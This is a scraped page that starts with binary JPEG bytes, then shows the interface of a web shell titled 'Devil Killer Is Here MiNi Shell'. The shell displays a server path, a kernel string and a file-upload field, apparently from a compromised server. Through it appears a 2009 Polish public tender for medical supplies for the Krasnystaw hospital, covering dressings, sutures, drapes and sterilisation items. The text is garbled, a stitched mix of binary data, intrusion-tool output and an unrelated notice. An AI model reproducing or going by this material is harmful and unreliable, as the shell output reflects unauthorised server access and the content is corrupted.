JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091014/177681-N-2009.html

<p class="kh_header"><b>Krasnystaw: PN 17/2009 Zakup i dostawa materiałów medycznych dla SP ZOZ w Krasnymstawie</b><br>
<b>Numer ogłoszenia: 177681 - 2009; data zamieszczenia: 14.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie , ul. M. Sobieskiego 4B, 22-300 Krasnystaw, woj. lubelskie, tel. 082 5762170, faks 082 5764901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozkrasnystaw.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samodzielny Publiczny Zespół Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN 17/2009 Zakup i dostawa materiałów medycznych dla SP ZOZ w Krasnymstawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia stanowi podzielona na 5 pakietów dostawa materiałów opatrunkowych, szewnych, obłożeń, wyrobów jednorazowych z włókniny oraz plastiku, rękawów papierowo-foliowych, testów do sterylizacji, nabojów gazowych oraz opatrunków wraz z plastrami do kaniul.
2. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ. Podane ilości są szacunkowym zapotrzebowaniem na okres 12 miesięcy. Zamawiający zastrzega sobie prawo do rezygnacji z zakupu części asortymentu wynikającej z braku zapotrzebowania.
3. Dostarczony asortyment musi posiadać atesty dopuszczające do użytku w placówkach służby zdrowia na terenie Polski.
4. Zamawiający nie zamierza zwoływać zebrania wykonawców.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.19-7, 33.14.11.15-9, 33.14.11.12-8, 33.14.11.21-4, 33.14.13.20-9, 33.14.00.00-3, 33.69.63.00-8, 33.77.00.00-8, 33.19.11.00-6, 33.14.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium. 
Wadium dla całości zamówienia wynosi 5 000,00 zł (słownie: pięć tysięcy złotych 00 100). W tym dla poszczególnych pakietów: 
- Pakiet 1.- 1 500,00 zł (słownie: jeden tysiąc pięćset złotych 00 100),
- Pakiet 2. - 1 500,00 zł (słownie: jeden tysiąc pięćset złotych 00 100),
- Pakiet 3. - 500,00 zł (słownie: pięćset złotych 00 100),
- Pakiet 4. - 1 000,00 zł (słownie: jeden tysiąc złotych 00 100),
- Pakiet 5. - 500,00 zł (słownie: pięćset złotych 00 100).
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
2.1	 pieniądzu,
2.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
2.3	gwarancjach bankowych,
2.4	gwarancjach ubezpieczeniowych, 
2.5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego: Kredyt Bank S.A Oddz.Chełm, Nr rachunku 98 1500 1373 1213 7001 1365 0000 z dopiskiem: Wadium PN 17 2009 Zakup i dostawa materiałów medycznych 
4. Wykonawca powinien złożyć w ofercie dowód wniesienia wadium w przypadku wpłaty przelewem. Terminem wniesienia wadium jest data i czas uznania rachunku Zamawiającego.
5. W przypadku wniesienia wadium w formach innych niż pieniądzu wykonawca zobowiązany jest dołączyć do oferty gwarancję bądź poręczenie w następujący sposób: kserokopię potwierdzoną za zgodność z oryginałem zszyć, zbindować lub w inny sposób trwale złączyć z ofertą, natomiast oryginał dokumentu należy złożyć wraz z ofertą w taki sposób, aby była możliwość jego zwrócenia bez dekompletowania oferty. W przypadku, gdy oryginał dokumentu będzie zszyty, zbindowany lub w inny sposób trwale złączony z ofertą zamawiający nie dokona jego zwrotu. 
6. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
6.1	być wystawione na Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4 B, 22-300 Krasnystaw,
6.2	zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 5 ustawy,
6.3	w przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązanie gwaranta (poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań opisanych w art. 46 ust. 5 ustawy każdego z tych wykonawców,
6.4	okres ważności wadium nie może być krótszy niż okres związania ofertą, przy czym pierwszym dniem ważności zobowiązania jest dzień składania ofert.
7. Zamawiający zwróci wadium na zasadach określonych w art. 46 ustawy. W przypadku wniesienia wadium w pieniądzu, w ofercie należy podać nazwę, adres banku oraz numer konta, na jakie zamawiający dokonuje zwrotu wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający następujące warunki:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków udziału w postępowaniu zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia na podstawie złożonych oświadczeń oraz dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> OFERTA POWINNA ZAWIERAĆ NASTĘPUJĄCE DOKUMENTY brak któregokolwiek z poniższych dokumentów lub dokumenty o treści odmiennej od wymaganych spowoduje odrzucenie oferty
1. Wypełniony i podpisany Formularz ofertowy (Załącznik Nr 1).
2. Wypełniony i podpisany Formularz cenowy  (Załącznik Nr 2).
3. Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 i art. 24 ust.1 i 2 ustawy Pzp   (Załącznik Nr 3).
4. Wypełniony  Wzór umowy sprzedaży (Załącznik Nr 4).
5. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji i działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli działalność prowadzona jest w formie spółki cywilnej do oferty należy dołączyć umowę spółki.
6. Zaświadczenie z właściwego Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.
7. Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9. Stosowne zezwolenie, koncesja lub licencja - właściwych organów na podjęcie działalności gospodarczej w zakresie objętym zamówieniem.
10. Stosowne dokumenty zaświadczenia, atesty, certyfikaty (lub inne dokumenty) potwierdzające dopuszczenie do obrotu na terenie Polski przedmiotu oferty zgodnie z ustawą o wyrobach medycznych z dnia 20 kwietnia 2004 r. (Dz. U. Nr 93 poz. 896 ze zm.) lub oświadczenie o posiadaniu odpowiednich dokumentów wraz z zobowiązaniem o udostępnieniu ich na każde żądanie Zamawiającego.
11. Do oferty należy dołączyć próbki na cały zaoferowany asortyment (dotyczy pakietu 3), celem weryfikacji zgodności zaoferowanych wyrobów z zapisami SIWZ. Próbki winny być oryginalnie zapakowane, opatrzone etykietą producenta. Ponadto do oferty należy dołączyć pisemny wykaz przekazanych próbek.
Próbki winny znajdować się w oddzielnym opakowaniu niż oferta. Opakowanie powinno być oznaczona: Próbki do przetargu nieograniczonego na zakup i dostawy materiałów medycznych - Nr sprawy: 17 2009 Wewnątrz należy umieścić informacje o nazwie, adresie Wykonawcy oraz wykaz przekazanych próbek.
12. Dowód wniesienia wadium. W przypadku wniesienia wadium w formie gwarancji, do oferty należy dołączyć poświadczoną za zgodność z oryginałem kserokopię a oryginał dostarczyć w osobnej kopercie. 
13. Ewentualne pełnomocnictwo, jeśli uprawnienie do reprezentowania Wykonawcy   nie wynika z innych dokumentów załączonych przez Wykonawcę.

Dokumenty, o których mowa powyżej powinny być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Jeżeli dokument przedstawiony jest w postaci kopii - poświadczenie oprócz adnotacji za zgodność z oryginałem musi być opatrzone imienną pieczątką i podpisem osoby (osób) upoważnionej do reprezentowania firmy na zewnątrz. Dokumenty wystawione w języku obcym, należy złożyć w formie odpisu, wypisu, wyciągu lub kopii przetłumaczone na język polski, poświadczone przez tłumacza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzozkrasnystaw.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ w Krasnymstawie, ul. M. Sobieskiego 4B, 22-300 Krasnystaw.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 11:00, miejsce: Kancelaria SP ZOZ w Krasnymstawie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1. Materiały opatrunkowe
Wadium 1 500,00 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przylepiec na włókninie 5m x 5cm x 1 *	szt.	400
2.	Przylepiec na włókninie 5m x 2,5cm x 1 *	szt.	1700
3.	Gaza opatrunkowa bawełniana 17-nitkowa, szer. 90 cm x 1	mb.	25000
4.	Kompresy gazowe niejałowe 17- nitkowe 8 warstw 7,5cm x 7,5cm x 100 do chirurgicznych zabiegów inwazyjnych z zakładanymi brzegami	op.	1000
5.	Opaska gipsowa 3 m x 14 cm do 15 cm x 1op a 2 szt.	szt.	4000
6.	Opaska dziana podtrzymująca bandaż 4 m x 10 cm x 1 *	szt.	18000
7.	Opaska dziana podtrzymująca bandaż 4 m x 15 cm x 1 *	szt.	8000
8.	Opaska elastyczna z zapinką 5 m x 15 cm x 1 *	szt.	800
9.	Opaska gazowa tkana podtrzymująca bandaż 4 m x 15 cm x 1	szt.	200
10.	Przylepiec na tkaninie 5 m x 1,25 cm x 1 *	szt.	300
11.	Przylepiec na tkaninie 5 m x 2,5 cm x 1 *	szt.	1000
12.	Przylepiec na tkaninie 5 m x 5 cm x 1 *	szt.	300
13.	Wata celulozowa higieniczna arkusz 60 cm x 40 cm x 1	kg	800
14.	Wata celulozowa higieniczna rolka 150 g x 1	szt.	300
15.	Wata opatrunkowa bawełniano-wiskozowa 500 g x 1- min 70% bawełny	kg	1100
16.	Prertoris plaster op 10 cm x 8 cm x 1 szt.	szt.	1000
17.	Kompresy włókninowe niejałowe 7,5 x 7,5 x 100 szt. 	op.	100
18.	Wata prasowana podgipsowa szer. 10 cm x 3 m x 1 szt.	op.	100
19.	Wata prasowana podgipsowa szer. 15 cm x 3 m x 1 szt.	op.	100
20.	Kompresy włókninowe jałowe 10 cm x 10 cm x 2 szt.	op.	1000
							
* - Pozycje 1, 2, 10, 11, 12 - opakowania pojedyńcze w kartoniku z nazwą i opisem produktu, hypoalergiczny klej kauczukowy
* - Pozycje 6, 7, 8 - pakowane pojedyńczo.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4, 33.14.11.19-7, 33.14.11.15-9, 33.14.11.12-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2. Nici chirurgiczne niewchłanialne, wchłanialne i specjalistyczne
Wadium 1 500,00 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szwy niewchłanialne
Szew skórny, monofilamentowy, poliamidowy.				
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
1	6/0	45	3/8 koła, 12 mm, odwrotnie tnąca	144
2	5/0	45	3/8 koła, 16 mm, odwrotnie tnąca	36
3	4/0	45**	3/8 koła, 16 mm, kosmetyczna	12
4	4/0 	45*	3/8 koła, 19 mm, odwrornie tnąca	24
5	4/0	45	3/8 koła, 24 mm, odwrotnie tnąca	396
6	3/0	74	3/8 koła, 24 mm, odwrotnie tnąca	288
7	3/0	45	3/8 koła, 24 mm, odwrotnie tnąca	1512
8	3/0 	45*	3/8 koła, 24 mm, odwrotnie tnąca	24
9	2/0	45	3/8 koła, 24 mm, odwrotnie tnąca	468
10	2/0	75	3/8 koła, 30 mm, odwrotnie tnąca	1080
11	0	100	1/2 koła, 27 mm, okrągła pogrubiana	36
12	1	100	1/2 koła, 27 mm, okrągła pogrubiana	72			
* - szew o kontrolowanej elastyczności przy dociąganiu węzła, polibutester				
** - igła kosmetyczna z 4 płaszczyznami tnącymi				
Szew syntetyczny, pleciony, poliamidowy, pokrywany silikonem.				
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
13	3/0	75	1/2 koła, 26 mm, okrągła cienka	540
14	2/0	75	1/2 koła, 26 mm, okrągła cienka	360
15	0	75	1/2 koła, 26 mm, okrągła cienka	144
16	1	75	1/2 koła, 26 mm, okrągła cienka	36
17	2/0	7x75	podwiązki	36
18	0	7x75	podwiązki	36			
Szew syntetyczny, monofilamentowy, polipropylenowy z dodatkiem substancji uplastyczniającej poly-ethylene-glicol.	
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
19	5/0	75	1/2 koła, 13 mm, 2x okragła	36
20	3/0	90	1/2 koła, 17 mm, 2x okragła	72
21	3/0	75	1/2 koła, 12 mm, 2x okragła	36
22	2/0	75	prosta, 60 mm, odwrotnie tnąca	108
Szwy wchłanialne											
Szew syntetyczny, pleciony, wchłanialny, z mieszniny kwasu poliglikolowego i polimlekowego, zdolność podtrzymywania tkankowego  po 2 tyg. 80%, po 3 tyg. min30 %, czas wchłaniania 56-70 dni.
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
1	8/0	30	3/8 koła, 6 mm, 2x szpatuła	24
2	4/0	75	1/2 koła, 26 mm, okrągła cienka	36
3	3/0	75	1/2 koła, 26 mm, okrągła cienka	756
4	3/0	75	1/2 koła, 37 mm, okrągła cienka	360
5	3/0	75	3/8 koła, 19 mm, odwrotnie tnąca	36
6	2/0	75	1/2 koła, 22 mm, okrągła cienka	36
7	2/0	75	1/2 koła, 26 mm, okrągła cienka	576
8	0	75	1/2 koła, 30 mm, okrągła cienka	720
9	1	75	1/2 koła, 37 mm, okrągła	1152
10	1	75	1/2 koła, 27 mm, okrągła pogrubiona	144
11	1	120 pętla	1/2 koła, 65 mm, okrągła	72
12	1	75	1/2 koła, 48 mm, odwrotnie tnąca	252
13	1	75	1/2 koła, 48 mm, okrągła	144
14	0	75	1/2 koła, 26 mm, okrągła cienka	36
15	2	75	1/2 koła, 37 mm, okrągła	288
16	2/0	150	podwiązka	36
17	0	150	podwiązka	36
18	1	150	podwiązka	36
Szew syntetyczny, monofilamentowy, szybkowchłanialny, niepowlekany, zdolność podtrzymywania tkankowego po 5 dniach  min. 50-60 % pierwotnej siły, po 10 dniach  min.20-30 %,  czas wchłaniania 40-56 dni. 
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
19	4/0	75	1/2 koła, 22 mm, okrągła	36
20	3/0	75	1/2 koła, 22 mm, okrągła	36
Nici syntetyczne, jednowłóknowe, wchłanialne z mieszaniny glikolidu, trójmetylanu węgla i dioksanonu, z igłą, o	okresie wchłaniania 90-110 dni i zdolności podtrzymywania tkankowego po 2 tyg. min 75%, po 3 tyg. min 40%. 
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
21	2/0	75	1.2 koła, 27 mm, okrągła cienka	36
Szwy specjalistyczne											
Szew naturalny, jedwabny, pleciony, niewchłanialny, powlekany.
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
1	8/0	40-45 *	3/8 koła, 6-7 mm, 2x spatuła	120
 * - szew barwiony
Szew monofilamentowy, nylonowy.			
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
2	10/0	30-35 *	1/2 koła, 5,5 mm, 2x spatuła	120
 * - szew barwiony
Szew pleciony, wchłanialny, powlekany.
Lp.	Grubość nici	Długość nici	Rodzaj igły	Ilość saszetek
3	6/0	40-45 *	1/4 koła, 6-8 mm, 2x spatuła	72
4      7/0	 30-45 *	3/8 koła, 6-7 mm, 2x spatuła	72
* - szew barwiony.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4, 33.14.13.20-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3. Obłożenia oraz wyroby jednorazowe z włókniny oraz plastiku. 
Wadium 500,00 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Fartuch chirurgiczny sterylny, wykonany z włókniny wysokobarierowej, rękawy z bawełnianym mankietem, tylne poły fartucha zakładane i wiązane na troki łączone kartonikiem. 	10	szt.	2000
2. Fartuch niesterylny z fizeliny. Kolor zielony	10	szt.	1200
2. Jednorazowy czepek o okrągłym kształcie, wyposażony w elastyczny ściągacz. 	10	szt.	4000
3. Maska chirurgiczna 3-warstwowa z dużą efektywnością filtracji, bez lateksu, włókien szklanych i innych substancji alergicznych z tasiemką.	10	szt.	7000
4. Zestaw sterylnych serwet:                                                                                               Serweta okulistyczna, sterylna, nieprzemakalna wykonana z włókniny polipropylenowej. Otwór o wielkości ok. 5-7 cm z folią + worek na płyn. Serweta o wymiarach ok. 100 x 180 cm.                             
Setweta sterylna wykonana z włókniny polipropylenowej o wymiarach ok. 100 x 150 cm.                                                                                        
Całość owinięta w serwetę ok. 100 x 150 cm nie przemakalną która może służyć jako pokrycie stolika. 	10	szt.	800
5. Osłona na poręcz fotela/podłokietnik sterylna.	10	szt.	400.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4. Rękawy papierowo-foliowe, testy chemiczne do kontroli sterylizacji oraz naboje gazowe.
Wadium 1 000,00 PLN.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymogi ogólne (parametry krytyczne) do potwierdzenia dokumentem wydanym przez producenta:								
1. Gramatura papieru: 
min 70 g/m 2								
2. Zawartość chlorków (dotyczy papieru):
< 0,03%								
3. Wytrzymałość na przepuklenie na sucho: 
> 400 kPa								
4. Wytrzymałośc na przepuklenie na mokro: 
> 150 kPa								
5. Wytrzymałość na rozdarcia: 
> 750 mN								
6. Liczba warstw łącznie z warstwą klejącą: 
min. 5 warstw								
7. Wytrzymałość foli na rozdarcia: 
min. 250 mN								
8. Wskaźnik przerwania:
> 32 N/15mm 

Tabela 1. Rękawy papierowo-foliowe płaskie 						
Lp.	Szerokość	Jm.	Ilość
1.	50 mm	mb	4 800
2.	75 mm	mb	4 800
3.	100 mm	mb	7 200
4.	125 mm	mb	7 200
5.	150 mm	mb	7 200
6.	200 mm	mb	7 200
7.	250 mm	mb	7 200
8.	300 mm	mb	7 200
9.	380 mm	mb	4 800

Tabela 2. Testy chemiczne do kontroli sterylizacji 						
1. Testy paskowe perforowane do kontroli sterylizacji parowej.                                             
Perforacja umożliwiająca łatwy podział na dwa mniejsze paski.	1.6 cm	21.6 cm	sztuk (niedzielonych pasków)	23 040
2. Testy paskowe perforowane do kontroli sterylizacji gazowej.                                        
Perforacja umożliwiająca łatwy podział na dwa mniejsze paski.	1.6 cm	21.6 cm	sztuk (niedzielonych pasków)	23 040

Tabela 3. Naboje gazowe
1.	Naboje gazowe do sterylizacji tlenkiem etylenu	100 g	100%	sztuk	350.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8, 33.77.00.00-8, 33.19.11.00-6.</li>
